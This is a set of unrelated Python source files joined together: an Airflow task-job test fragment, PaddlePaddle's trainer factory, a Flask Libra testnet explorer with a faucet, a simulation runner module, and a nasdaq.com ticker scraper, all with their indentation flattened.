# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
with dag_maker(
dag_id='test_mark_failure_2', start_date=DEFAULT_DATE, default_args={'owner': 'owner1'}
):
task = PythonOperator(
task_id='test_on_failure',
python_callable=task_function,
retries=1,
retry_delay=timedelta(seconds=2),
on_retry_callback=retry_callback,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.start()
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
time.sleep(0.4)
process.join(timeout=10)
ti.refresh_from_db()
assert ti.state == State.UP_FOR_RETRY
assert retry_callback_called.value == 1
assert task_terminated_externally.value == 1
@pytest.mark.quarantined
def test_process_sigterm_works_with_retries(self, dag_maker):
"""
Test that ensures that task runner sets tasks to retry when they(task runner)
receive sigterm
"""
# use shared memory value so we can properly track value change even if
# it's been updated across processes.
retry_callback_called = Value('i', 0)
task_terminated_externally = Value('i', 1)
shared_mem_lock = Lock()
def retry_callback(context):
with shared_mem_lock:
retry_callback_called.value += 1
assert context['dag_run'].dag_id == 'test_mark_failure_2'
def task_function(ti):
time.sleep(60)
# This should not happen -- the state change should be noticed and the task should get killed
with shared_mem_lock:
task_terminated_externally.value = 0
with dag_maker(dag_id='test_mark_failure_2'):
task = PythonOperator(
task_id='test_on_failure',
python_callable=task_function,
retries=1,
retry_delay=timedelta(seconds=2),
on_retry_callback=retry_callback,
)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.refresh_from_db()
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
job1.task_runner.start()
settings.engine.dispose()
process = multiprocessing.Process(target=job1.run)
process.start()
for _ in range(0, 25):
ti.refresh_from_db()
if ti.state == State.RUNNING and ti.pid is not None:
break
time.sleep(0.2)
os.kill(process.pid, signal.SIGTERM)
process.join(timeout=10)
ti.refresh_from_db()
assert ti.state == State.UP_FOR_RETRY
assert retry_callback_called.value == 1
assert task_terminated_externally.value == 1
def test_task_exit_should_update_state_of_finished_dagruns_with_dag_paused(self, dag_maker):
"""Test that with DAG paused, DagRun state will update when the tasks finishes the run"""
with dag_maker(dag_id='test_dags') as dag:
op1 = PythonOperator(task_id='dummy', python_callable=lambda: True)
session = settings.Session()
dagmodel = dag_maker.dag_model
dagmodel.next_dagrun_create_after = dag.following_schedule(DEFAULT_DATE)
dagmodel.is_paused = True
session.merge(dagmodel)
session.flush()
# Write Dag to DB
dagbag = DagBag(dag_folder="/dev/null", include_examples=False, read_dags_from_db=False)
dagbag.bag_dag(dag, root_dag=dag)
dagbag.sync_to_db()
dr = dag_maker.create_dagrun(run_type=DagRunType.SCHEDULED)
assert dr.state == State.RUNNING
ti = TaskInstance(op1, dr.execution_date)
job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
job1.task_runner = StandardTaskRunner(job1)
job1.run()
session.add(dr)
session.refresh(dr)
assert dr.state == State.SUCCESS
@pytest.fixture()
def clean_db_helper():
yield
db.clear_db_jobs()
db.clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
@pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]]) # type: ignore
@mock.patch("airflow.jobs.local_task_job.get_task_runner")
def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes, dag_maker):
unique_prefix = str(uuid.uuid4())
with dag_maker(dag_id=f'{unique_prefix}_test_number_of_queries'):
task = DummyOperator(task_id='test_state_succeeded1')
dag_maker.create_dagrun(run_id=unique_prefix, state=State.NONE)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
mock_get_task_runner.return_value.return_code.side_effects = return_codes
job = LocalTaskJob(task_instance=ti, executor=MockExecutor())
with assert_queries_count(18):
job.run()
|
trainer_factory.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defination of TrainerFactory."""
import threading
import time
import logging
import numpy as np
logging.basicConfig()
from .trainer_desc import MultiTrainer, DistMultiTrainer, PipelineTrainer
from .device_worker import Hogwild, DownpourSGD, Section
from .framework import Variable
from multiprocessing import Process, Manager
__all__ = ["TrainerFactory", "FetchHandler", "FetchHandlerMonitor"]
class TrainerFactory(object):
"""
Create trainer and device worker.
If opt_info is not None, it will get configs from opt_info,
otherwise create MultiTrainer and Hogwild.
"""
def __init__(self):
pass
def _create_trainer(self, opt_info=None):
trainer = None
device_worker = None
if opt_info == None:
# default is MultiTrainer + Hogwild
trainer = MultiTrainer()
device_worker = Hogwild()
trainer._set_device_worker(device_worker)
else:
trainer_class = opt_info["trainer"]
device_worker_class = opt_info["device_worker"]
trainer = globals()[trainer_class]()
device_worker = globals()[device_worker_class]()
if "fleet_desc" in opt_info:
device_worker._set_fleet_desc(opt_info["fleet_desc"])
trainer._set_fleet_desc(opt_info["fleet_desc"])
if opt_info.get("use_cvm") is not None:
trainer._set_use_cvm(opt_info["use_cvm"])
if opt_info.get("no_cvm") is not None:
trainer._set_no_cvm(opt_info["no_cvm"])
if opt_info.get("scale_datanorm") is not None:
trainer._set_scale_datanorm(opt_info["scale_datanorm"])
if opt_info.get("dump_slot") is not None:
trainer._set_dump_slot(opt_info["dump_slot"])
if opt_info.get("mpi_rank") is not None:
trainer._set_mpi_rank(opt_info["mpi_rank"])
if opt_info.get("mpi_size") is not None:
trainer._set_mpi_size(opt_info["mpi_size"])
if opt_info.get("dump_fields") is not None:
trainer._set_dump_fields(opt_info["dump_fields"])
if opt_info.get("dump_fields_path") is not None:
trainer._set_dump_fields_path(opt_info["dump_fields_path"])
if opt_info.get("dump_file_num") is not None:
trainer._set_dump_file_num(opt_info["dump_file_num"])
if opt_info.get("dump_converter") is not None:
trainer._set_dump_converter(opt_info["dump_converter"])
if opt_info.get("adjust_ins_weight") is not None:
trainer._set_adjust_ins_weight(opt_info[
"adjust_ins_weight"])
if opt_info.get("copy_table") is not None:
trainer._set_copy_table_config(opt_info["copy_table"])
if opt_info.get("check_nan_var_names") is not None:
trainer._set_check_nan_var_names(opt_info[
"check_nan_var_names"])
if opt_info.get("dump_param") is not None:
trainer._set_dump_param(opt_info["dump_param"])
trainer._set_device_worker(device_worker)
return trainer
class FetchHandlerMonitor(object):
"""
Defination of FetchHandlerMonitor class,
it's for fetch handler.
"""
def __init__(self, scope, handler):
self.fetch_instance = handler
self.fetch_thread = threading.Thread(
target=self.handler_launch_func, args=(scope, self.fetch_instance))
self.running_lock = threading.Lock()
self.running = False
def handler_launch_func(self, scope, handler):
fetch_instance = handler
period_secs = fetch_instance.period_secs
var_name_to_key = {}
for key in fetch_instance.var_dict:
if isinstance(fetch_instance.var_dict[key], Variable):
var_name_to_key[fetch_instance.var_dict[key].name] = key
else:
logging.warning("the value of {} is not a Variable".format(key))
var_name_to_key["None.var"] = key
elapsed_secs = 0
while True:
self.running_lock.acquire()
if self.running == False:
break
if elapsed_secs < period_secs:
# TODO(guru4elephant): needs customized condition
time.sleep(1)
elapsed_secs += 1
else:
elapsed_secs = 0
fetch_dict = {}
for key in var_name_to_key:
var = scope.find_var(key)
fetch_dict[key] = var
if var == None:
logging.warning("{} value currently not available".
format(var_name_to_key[key]))
res_dict = {}
for key in fetch_dict:
user_name = var_name_to_key[key]
if fetch_dict[key] == None:
res_dict[user_name] = None
continue
else:
res_dict[user_name] = fetch_dict[key].get_tensor()
lod = res_dict[user_name].lod()
if len(lod) > 0:
raise RuntimeError("Some of your fetched tensors \
hold LoD information. \
They can not be completely cast \
to Python ndarray. We can \
not return LoDTensor itself directly, \
please choose another targets")
if res_dict[user_name]._is_initialized():
res_dict[user_name] = np.array(res_dict[user_name])
else:
res_dict[user_name] = None
fetch_instance.handler(res_dict)
self.running_lock.release()
def start(self):
"""
start monitor,
it will start a monitor thread.
"""
self.running_lock.acquire()
self.running = True
self.running_lock.release()
self.fetch_thread.setDaemon(True)
self.fetch_thread.start()
def stop(self):
self.running_lock.acquire()
self.running = False
self.running_lock.release()
|
Browser.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# execute in production with: nohup python3 Browser.py &> browser.log < /dev/null &
###########
# Imports #
###########
import re
import sys
import os
import traceback
import json
from time import sleep
from multiprocessing import Process
from rpc_client import get_acct_raw, get_acct_info, start_rpc_client_instance
from client import start_client_instance, do_cmd
from db_funcs import connect_to_db, get_latest_version, get_tx_from_db_by_version, get_all_account_tx, tx_db_worker
from stats import calc_stats
##############
# Flask init #
##############
from flask import Flask, request, redirect, send_from_directory
app = Flask(__name__, static_url_path='')
###############
# Definitions #
###############
ctr = 0 # counter of requests since last init
c2 = None # placeholder for connection object
header = '''<html><head><title>Libra Testnet Experimental Browser</title></head>
<body><h3>Experimental Libra testnet explorer by <a href="https://twitter.com/gal_diskin">@gal_diskin</a>
special thanks to Daniel Prinz for his help</h3>
<h3>Courtesy of <a href="https://www.firstdag.com">First Group</a></h3>
I developed this to make testing easier. I have no patiance ATM to make it pretty / faster / more stable.
I might continue to develop this if I see it has value to others...
If you liked this feel free to let me know and send me some tokens on the testnet at:
<a href='/account/e945eec0f64069d4f171d394aa27881fabcbd3bb6bcc893162e60ad3d6c9feec'>
e945eec0f64069d4f171d394aa27881fabcbd3bb6bcc893162e60ad3d6c9feec</a>
'''
index_template = open('index.html.tmpl', 'r', encoding='utf-8').read()
version_template = open('version.html.tmpl', 'r', encoding='utf-8').read()
version_error_template = header + "<h1>Couldn't read version details!<h1></body></html>"
stats_template = open('stats.html.tmpl', 'r', encoding='utf-8').read()
account_template = open('account.html.tmpl', 'r', encoding='utf-8').read()
faucet_template = open('faucet.html.tmpl', 'r', encoding='utf-8').read()
faucet_alert_template = '<div class="text-center"><div class="alert alert-danger" role="alert"><p>{0}</p></div></div>'
invalid_account_template = header + '<h1>Invalid Account format!<h1></body></html>'
################
# Helper funcs #
################
def update_counters():
global ctr
ctr += 1
print('counter:', ctr)
sys.stdout.flush()
def is_valid_account(acct):
if (not re.match("^[A-Za-z0-9]*$", acct)) or (len(acct) != 64):
print("invalid Account:", acct)
return False
return True
def gen_tx_table_row(tx):
res = '<tr><td>'
res += '<a href="/version/' + str(tx[0]) + '">' + str(tx[0]) + '</a></td><td>' # Version
res += str(tx[1]) + '</td><td>' # expiration date
res += ('🤝' if tx[4] == 'peer_to_peer_transaction' else '🛠') + '</td><td>' # type
res += '<p class="text-monospace">'
res += '<a href="/account/' + str(tx[2]) + '">' + str(tx[2]) + '</a> → ' # source
res += '<a href="/account/' + str(tx[3]) + '">' + str(tx[3]) + '</a></p></td><td>' # dest
res += '<strong>' + str(tx[5]) + ' Libra</strong></td>' # amount
res += '</tr>'
return res
def add_br_every64(s):
x = len(s)
i = 0
res = ''
while i+64 < x:
res += s[i:i+64] + '<br>'
i += 64
res += s[i:]
return res
##########
# Routes #
##########
@app.route('/')
def index():
update_counters()
c2, conn = connect_to_db(config['DB_PATH'])
bver = str(get_latest_version(c2))
conn.close()
return index_template.format(bver)
@app.route('/version/<ver>')
def version(ver):
update_counters()
c2, conn = connect_to_db(config['DB_PATH'])
bver = str(get_latest_version(c2))
try:
ver = int(ver)
tx = get_tx_from_db_by_version(ver, c2)
except:
conn.close()
return version_error_template
# for toggle raw view
if request.args.get('raw') == '1':
extra = """<tr>
<td><strong>Program Raw</strong></td>
<td><pre>{0}</pre></td>
</tr>""".format(tx[-1])
not_raw = '0'
else:
extra = ''
not_raw = '1'
conn.close()
return version_template.format(bver, *tx, add_br_every64(tx[12]), extra, not_raw, tx[-2].replace('<', '<'))
@app.route('/account/<acct>')
def acct_details(acct):
print(acct)
update_counters()
try:
page = int(request.args.get('page'))
except:
page = 0
if not is_valid_account(acct):
return invalid_account_template
c2, conn = connect_to_db(config['DB_PATH'])
bver = str(get_latest_version(c2))
acct_state_raw = get_acct_raw(acct)
acct_info = get_acct_info(acct_state_raw)
print('acct_info', acct_info)
try:
tx_list = get_all_account_tx(c2, acct, page)
tx_tbl = ''
for tx in tx_list:
tx_tbl += gen_tx_table_row(tx)
except:
print(sys.exc_info())
traceback.print_exception(*sys.exc_info())
print('error in building table')
next_page = "/account/" + acct + "?page=" + str(page + 1)
conn.close()
return account_template.format(bver, *acct_info, tx_tbl, next_page)
@app.route('/search')
def search_redir():
tgt = request.args.get('acct')
if len(tgt) == 64:
print('redir to account', tgt)
return redirect('/account/'+tgt)
else:
print('redir to tx', tgt)
return redirect('/version/'+tgt)
@app.route('/stats')
def stats():
update_counters()
c2, conn = connect_to_db(config['DB_PATH'])
try:
# get stats
stats_all_time = calc_stats(c2)
stats_24_hours = calc_stats(c2, limit = 3600 * 24)[5:]
stats_one_hour = calc_stats(c2, limit = 3600)[5:]
ret = stats_template.format(*stats_all_time, *stats_24_hours, *stats_one_hour)
except:
print(sys.exc_info())
traceback.print_exception(*sys.exc_info())
print('error in stats')
conn.close()
return ret
@app.route('/faucet', methods=['GET', 'POST'])
def faucet():
update_counters()
c2, conn = connect_to_db(config['DB_PATH'])
bver = str(get_latest_version(c2))
message = ''
if request.method == 'POST':
try:
acct = request.form.get('acct')
print(acct)
amount = request.form.get('amount')
print(amount)
if float(amount) < 0:
message = 'Amount must be >= 0'
elif not is_valid_account(acct):
message = 'Invalid account format'
else:
do_cmd('a mb 0 ' + str(float(amount)), p = p)
do_cmd('tb 0 ' + acct + ' ' + str(float(amount)), p = p)
acct_link = '<a href="/account/{0}">{0}</a>'.format(acct)
message = 'Sent ' + amount + ' <small>Libra</small> to ' + acct_link
except:
traceback.print_exception(*sys.exc_info())
message = 'Invalid request logged!'
if message:
message = faucet_alert_template.format(message)
return faucet_template.format(bver, message)
@app.route('/assets/<path:path>')
def send_asset(path):
return send_from_directory('assets', path)
########
# Main #
########
if __name__ == '__main__':
with open('config.json', 'r') as f:
config = json.load(f)
try:
config = config[os.getenv("BROWSER")]
except:
config = config["PRODUCTION"]
print("system configuration:")
print(json.dumps(config, indent=4))
tx_p = Process(target=tx_db_worker, args=(config['DB_PATH'], config['RPC_SERVER'], config['MINT_ACCOUNT']))
tx_p.start()
start_rpc_client_instance(config['RPC_SERVER'], config['MINT_ACCOUNT'])
p = start_client_instance(config['CLIENT_PATH'], config['ACCOUNT_FILE'])
sleep(1)
app.run(port=config['FLASK_PORT'], threaded=config['FLASK_THREADED'],
host=config['FLASK_HOST'], debug=config['FLASK_DEBUG'])
|
default.py | """ Default Runner & Worker components
Local Runner
Memmap Interface (numpy)
Template Preprocessor
JSON Postprocessor
NumpytxtPostprocessor
HDF5Postprocessor
"""
from .runner import Runner, RunnerInterface
from .worker import Interface, Preprocessor, Postprocessor, Worker
import subprocess
from multiprocessing import Process
from time import sleep
import logging
import numpy as np
import os
from shutil import rmtree
# === Local Runner === #
@Runner.register('local')
class LocalRunner(Runner):
""" Runner for executing simulations locally
- forks the worker, thereby having less overhead (especially with a custom python Worker)
- per default uses all available CPUs
"""
def spawn_run(self, params=None, wait=False):
super().spawn_run(params, wait)
if self.run_config['custom'] or not self.config['fork']:
env = self.env.copy()
env['PROFIT_RUN_ID'] = str(self.next_run_id)
if self.run_config['custom']:
cmd = self.run_config['command']
else:
cmd = 'profit-worker'
self.runs[self.next_run_id] = subprocess.Popen(cmd, shell=True, env=env, cwd=self.base_config['run_dir'])
if wait:
self.runs[self.next_run_id].wait()
del self.runs[self.next_run_id]
else:
os.chdir(self.base_config['run_dir'])
worker = Worker.from_config(self.run_config, self.next_run_id)
process = Process(target=worker.main)
self.runs[self.next_run_id] = (worker, process)
process.start()
if wait:
process.join()
del self.runs[self.next_run_id]
os.chdir(self.base_config['base_dir'])
self.next_run_id += 1
def spawn_array(self, params_array, blocking=True):
""" spawn an array of runs, maximum 'parallel' at the same time, blocking until all are done """
if not blocking:
raise NotImplementedError
for params in params_array:
self.spawn_run(params)
while len(self.runs) >= self.config['parallel']:
sleep(self.config['sleep'])
self.check_runs(poll=True)
while len(self.runs):
sleep(self.config['sleep'])
self.check_runs(poll=True)
def check_runs(self, poll=False):
""" check the status of runs via the interface """
self.interface.poll()
if self.run_config['custom'] or not self.config['fork']:
for run_id, process in list(self.runs.items()): # preserve state before deletions
if self.interface.internal['DONE'][run_id]:
process.wait() # just to make sure
del self.runs[run_id]
elif poll and process.poll() is not None:
del self.runs[run_id]
else:
for run_id, (worker, process) in list(self.runs.items()): # preserve state before deletions
if self.interface.internal['DONE'][run_id]:
process.join() # just to make sure
del self.runs[run_id]
elif poll and process.exitcode is not None:
process.terminate()
del self.runs[run_id]
def cancel_all(self):
if self.run_config['custom'] or not self.config['fork']:
for process in self.runs.values():
process.terminate()
else:
for worker, process in self.runs.values():
process.terminate()
self.runs = {}
# === Numpy Memmap Inerface === #
@RunnerInterface.register('memmap')
class MemmapRunnerInterface(RunnerInterface):
""" Runner-Worker Interface using a memory mapped numpy array
- expected to be very fast with the *local* Runner as each Worker can access the array directly (unverified)
- expected to be inefficient if used on a cluster with a shared filesystem (unverified)
- reliable
- known issue: resizing the array (to add more runs) is dangerous, needs a workaround
(e.g. several arrays in the same file)
"""
def __init__(self, config, size, input_config, output_config, *, logger_parent: logging.Logger = None):
super().__init__(config, size, input_config, output_config, logger_parent=logger_parent)
init_data = np.zeros(size, dtype=self.input_vars + self.internal_vars + self.output_vars)
np.save(self.config['path'], init_data)
try:
self._memmap = np.load(self.config['path'], mmap_mode='r+')
except FileNotFoundError:
self.runner.logger.error(
f'{self.__class__.__name__} could not load {self.config["path"]} (cwd: {os.getcwd()})')
raise
# should return views on memmap
self.input = self._memmap[[v[0] for v in self.input_vars]]
self.output = self._memmap[[v[0] for v in self.output_vars]]
self.internal = self._memmap[[v[0] for v in self.internal_vars]]
def clean(self):
if os.path.exists(self.config['path']):
os.remove(self.config['path'])#
@Interface.register('memmap')
class MemmapInterface(Interface):
""" Runner-Worker Interface using a memory mapped numpy array
counterpart to :py:class:`MemmapRunnerInterface`
"""
def __init__(self, config, run_id: int, *, logger_parent: logging.Logger = None):
super().__init__(config, run_id, logger_parent=logger_parent)
# ToDo: multiple arrays after another to allow extending the file dynamically
try:
self._memmap = np.load(self.config['path'], mmap_mode='r+')
except FileNotFoundError:
self.worker.logger.error(
f'{self.__class__.__name__} could not load {self.config["path"]} (cwd: {os.getcwd()})')
raise
# should return views on memmap
inputs, outputs = [], []
k = 0
for k, key in enumerate(self._memmap.dtype.names):
if key == 'DONE':
break
inputs.append(key)
for key in self._memmap.dtype.names[k:]:
if key not in ['DONE', 'TIME']:
outputs.append(key)
self.input = self._memmap[inputs][run_id]
self.output = self._memmap[outputs][run_id]
self._data = self._memmap[run_id]
def done(self):
self._memmap['TIME'] = self.time
self._memmap['DONE'] = True
self._memmap.flush()
def clean(self):
if os.path.exists(self.config['path']):
os.remove(self.config['path'])
# === Template Preprocessor === #
@Preprocessor.register('template')
class TemplatePreprocessor(Preprocessor):
""" Preprocessor which substitutes the variables with a given template
- copies the given template directory to the target run directory
- searches all files for variables templates of the form {name} and replaces them with their values
- for file formats which use curly braces (e.g. json) the template identifier is {{name}}
- substitution can be restricted to certain files by specifying `param_files`
- relative symbolic links are converted to absolute symbolic links on copying
- linked files are ignored with `param_files: all`, but if specified explicitly the link target is copied to the run
directory and then substituted
"""
def pre(self, data, run_dir):
# No call to super()! replaces the default preprocessing
from profit.pre import fill_run_dir_single
if os.path.exists(run_dir):
rmtree(run_dir)
fill_run_dir_single(data, self.config['path'], run_dir, ignore_path_exists=True,
param_files=self.config['param_files'])
os.chdir(run_dir)
# === JSON Postprocessor === #
@Postprocessor.register('json')
class JSONPostprocessor(Postprocessor):
""" Postprocessor to read output from a JSON file
- variables are assumed to be stored with the correct key and able to be converted immediately
- not extensively tested
"""
def post(self, data):
import json
with open(self.config['path']) as f:
output = json.load(f)
for key, value in output.items():
data[key] = value
# === Numpy Text Postprocessor === #
@Postprocessor.register('numpytxt')
class NumpytxtPostprocessor(Postprocessor):
""" Postprocessor to read output from a tabular text file (e.g. csv, tsv) with numpy ``genfromtxt``
- the data is assumed to be row oriented
- vector variables are spread across the row and have to be in the right order, only the name of the variable should
be specified once in ``names``
- ``names`` which are not specified as output variables are ignored
- additional options are passed directly to ``numpy.genfromtxt()`
"""
def post(self, data):
dtype = [(name, float, data.dtype[name].shape if name in data.dtype.names else ())
for name in self.config['names']]
try:
raw = np.genfromtxt(self.config['path'], dtype=dtype, **self.config['options'])
except OSError:
self.logger.error(f'output file {self.config["path"]} not found')
self.logger.info(f'cwd = {os.getcwd()}')
dirname = os.path.dirname(self.config['path']) or '.'
self.logger.info(f'ls {dirname} = {os.listdir(dirname)}')
raise
for key in self.config['names']:
if key in data.dtype.names:
data[key] = raw[key]
# === HDF5 Postprocessor === #
@Postprocessor.register('hdf5')
class HDF5Postprocessor(Postprocessor):
""" Postprocessor to read output from a HDF5 file
- variables are assumed to be stored with the correct key and able to be converted immediately
- not extensively tested
"""
def post(self, data):
import h5py
with h5py.File(self.config['path'], 'r') as f:
for key in f.keys():
data[key] = f[key]
|
wxStocks_scrapers.py | import config, inspect, threading, time, logging, sys, ast, datetime, os, json
import pprint as pp
import zipfile as zf
import xml.etree.ElementTree as ET
from urllib.request import urlopen, Request
import urllib.error
from bs4 import BeautifulSoup
import requests
from modules.pyql import pyql
from wxStocks_modules import wxStocks_utilities as utils
from wxStocks_modules import wxStocks_db_functions as db
import sec_xbrl
from sec_xbrl import loadSECfilings
# something is clearly broken with additional data scrapes
def scrape_all_additional_data_prep(list_of_ticker_symbols): # Everything except basic yql and nasdaq
function_list = [
yf_analyst_estimates_scrape,
ms_key_ratios_scrape,
yf_annual_balance_sheet_scrape,
ms_annual_balance_sheet_scrape,
yf_annual_income_statement_scrape,
ms_annual_income_statement_scrape,
yf_annual_cash_flow_scrape,
ms_annual_cash_flow_scrape,
] # best to stagger these to maximize scrape gaps, but i should automate this somehow.
scrape_all_additional_data_execute(list_of_ticker_symbols, function_list)
def scrape_all_additional_data_execute(list_of_ticker_symbols, list_of_functions):
ticker_list = list_of_ticker_symbols
function_list = list_of_functions
one_day = (60 * 60 * 24)
yesterdays_epoch = float(time.time()) - one_day
if ticker_list:
logging.info("updating: {}".format(ticker_list))
else:
return
number_of_tickers = len(ticker_list)
number_of_functions = len(function_list)
scrape_sleep_time = config.ADDITIONAL_DATA_SCRAPE_SLEEP_TIME
count = 1
# Here, best to scrape all data for one stock, switching functions to slow posibility of overscraping
for ticker_position in range(number_of_tickers):
for function_position in range(number_of_functions):
count_adjusted_for_sleep_time = (count * scrape_sleep_time) - (scrape_sleep_time - 1)
timer = threading.Timer(count_adjusted_for_sleep_time, function_list[function_position], [ticker_list[ticker_position]])
timer.start()
count += 1
#################### Nasdaq Ticker Symbol Scraper ##############################################
# no longer used
def download_ticker_symbols(): # from nasdaq.com
headers = config.HEADERS
exchanges = config.STOCK_EXCHANGE_LIST
exchange_data = []
for exchange in exchanges:
# Retrieve the webpage as a string
response = Request("http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange=%s&render=download" % exchange, headers=headers)
try:
page = urlopen(response)
except urllib.error.HTTPError as e:
logging.info(e.fp.read())
content = page.read()
content = content.splitlines()
ticker_data_list = []
for line in content:
dummy_list = line.split('"')
parsed_dummy_list = []
for datum in dummy_list:
if datum == ",":
pass
elif not datum:
pass
else:
parsed_dummy_list.append(datum)
ticker_data_list.append(parsed_dummy_list)
# Remove first unit of data which is:
# ['Symbol',
# 'Name',
# 'LastSale',
# 'MarketCap',
# 'ADR TSO',
# 'IPOyear',
# 'Sector',
# 'industry',
# 'Summary Quote']
ticker_data_list = ticker_data_list[1:]
exchange_data = exchange_data + ticker_data_list
#for ticker_data in ticker_data_list:
# logging.info("")
# pp.pprint(ticker_data)
exchange_data.sort(key = lambda x: x[0])
logging.info("Returning ticker download data: {} number of items".format(len(exchange_data)))
return exchange_data
# end no longer used
def nasdaq_full_ticker_list_downloader() : # from nasdaq.com
''' returns list of the form [nasdaq_ticker, firm_name, exchange, is_etf_bool]'''
headers = config.HEADERS
# weirdly this webpage displays different than the csv it downloads...
url = "ftp://ftp.nasdaqtrader.com/SymbolDirectory/nasdaqtraded.txt"
nasdaq_tickers = return_webpage(url, headers, delay=0)
big_list = str(nasdaq_tickers).split("\r\n")
ticker_meta_list = [x.split("|") for x in big_list]
ticker_titles = ticker_meta_list[0]
ticker_data_list = ticker_meta_list[1:]
ticker_data_list = ticker_data_list[:-2]
return_list = []
for data in ticker_data_list:
try:
ticker = data[1].replace("$", "^")
except:
logging.info(data)
firm_name = data[2]
exchange = None
exchange_letter = data[3]
if exchange_letter == "Q":
exchange = "NASDAQ"
elif exchange_letter == "N":
exchange = "NYSE"
elif exchange_letter == "Z":
exchange = "BATS"
elif exchange_letter == "P":
exchange = "NYSE"
elif exchange_letter == "A":
exchange = "NYSEmkt"
else:
logging.info(data)
etf_bool = None
etf_letter = data[5]
if etf_letter == "N":
etf_bool = False
elif etf_letter == "Y":
etf_bool = True
elif etf_letter == " ":
pass
else:
#logging.info(ticker_titles)
logging.info("{}: {}".format(data, data[5]))
cqs_symbol = data[9]
nasdaq_symbol = data[10]
data_to_return = [ticker, firm_name, exchange, etf_bool]
return_list.append(data_to_return)
return return_list
# suggestion from Soncrates
def nasdaq_stock_csv_url_and_headers_generator(exchanges=config.STOCK_EXCHANGE_LIST) : # from nasdaq.com
headers = config.HEADERS
for exchange in exchanges :
config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE = exchange.upper()
yield "http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange={}&render=download".format(config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE), headers
config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE = None
# yield etfs
yield "http://www.nasdaq.com/investing/etfs/etf-finder-results.aspx?download=Yes", headers
def return_webpage(url, headers, delay=15) : # I set the delay here at 15
logging.info('Scraping nasdaq.com')
if delay:
logging.info("Sleeping for %d seconds to prevent potential blocking of your ip address. You may change this as a keyword argument of this function." % delay)
time.sleep(delay)
#logging.warning("past delay")
response = Request(url)
#logging.warning('\n'+url+'\n')
#utils.print_attributes(response)
#logging.warning(response)
page = urlopen(response)
#logging.warning("\npage achieved\n")
return page.read()
def nasdaq_csv_stock_data_parsing_generator(csv_file):
rows_list = csv_file.splitlines()
for row_num in range(len(rows_list)):
logging.info(rows_list[row_num])
row_data = rows_list[row_num].decode('utf-8').split('",')
if row_num == 0:
dict_list = row_data
if not dict_list:
logging.error("Error: no description row exists for nasdaq data download")
return
else:
if not dict_list[-1]:
# here i will remove the empty string at the end of the typical list i get
# this is the default list i get:
#[u'"Symbol"',
# u'"Name"',
# u'"LastSale"',
# u'"MarketCap"',
# u'"IPOyear"',
# u'"Sector"',
# u'"industry"',
# u'"Summary Quote"',
# u'']
dict_list.pop()
elif str(dict_list[0]) == "Symbol,Name,LastSale,NetChange,NetChangeDirection,PercentChange,1YrPercentChange":
dict_list = dict_list[0].split(',')
dict_list = ['"' + x + '"' for x in dict_list]
else:
logging.info(dict_list[-1])
sys.exit()
continue
dict_to_return = {}
if not row_data:
continue
else:
for theoretical_csv_column_number in range(len(dict_list)):
if row_data[theoretical_csv_column_number] not in [None, u""]:
#pp.pprint(row_data[theoretical_csv_column_number])
dict_to_return[str(dict_list[theoretical_csv_column_number]).replace('"', "").replace(" ","_")] = str(row_data[theoretical_csv_column_number]).replace('"', "")
if dict_to_return:
yield dict_to_return
# suggestion from Soncrates
def convert_nasdaq_csv_to_stock_objects():
with db.db.transaction() as connection:
for url, headers in nasdaq_stock_csv_url_and_headers_generator():
# logging.warning("\nhere 1\n")
if len(config.STOCK_EXCHANGE_LIST) < 5: # it should be
nasdaq_csv = return_webpage(url, headers, delay=1)
else: # incase this program grows beyond my wildest dreams
nasdaq_csv = return_webpage(url, headers)
# logging.warning('\nhere again\n')
for stock_dict in nasdaq_csv_stock_data_parsing_generator(nasdaq_csv):
# stock_dict:
# {
# 'Sector': 'str',
# 'LastSale': 'float',
# 'Summary_Quote': 'ignore',
# 'Name': 'str',
# 'industry': 'str',
# 'Symbol': 'str',
# 'MarketCap': 'str',
# 'IPOyear': 'n/a or int'
# }
# add ".Exchange" below
if ("$" in stock_dict.get("Symbol")): # this is an "option chain" and we will ignore
continue
if ("/CL" in stock_dict.get("Symbol")): # this is a called option or warrant and we will ignore
continue
if ("/W" in stock_dict.get("Symbol")): # this is a warrant and we will ignore
continue
if " " in stock_dict.get("Symbol"):
stock_dict["Symbol"] = stock_dict.get("Symbol").replace(" ", "")
stock = None
stock = db.create_new_Stock_if_it_doesnt_exist(stock_dict.get("Symbol"), current_large_transaction=True)
logging.info(print(len(db.root.Stock)))
stock.firm_name = stock_dict.get("Name")
for attribute in stock_dict:
if attribute not in ["Symbol", "Summary_Quote", "LastSale"]:
datum = stock_dict.get(attribute)
if datum:
db.set_Stock_attribute(stock, attribute, datum, "_na", connection=True)
elif attribute == "LastSale":
try:
datum = float(stock_dict.get(attribute))
db.set_Stock_attribute(stock, attribute, datum, "_na", connection=True)
except:
db.set_Stock_attribute(stock, attribute, None, "_na", connection=True)
stock.Exchange_na = config.CURRENT_EXCHANGE_FOR_NASDAQ_SCRAPE
stock.last_nasdaq_scrape_update = time.time()
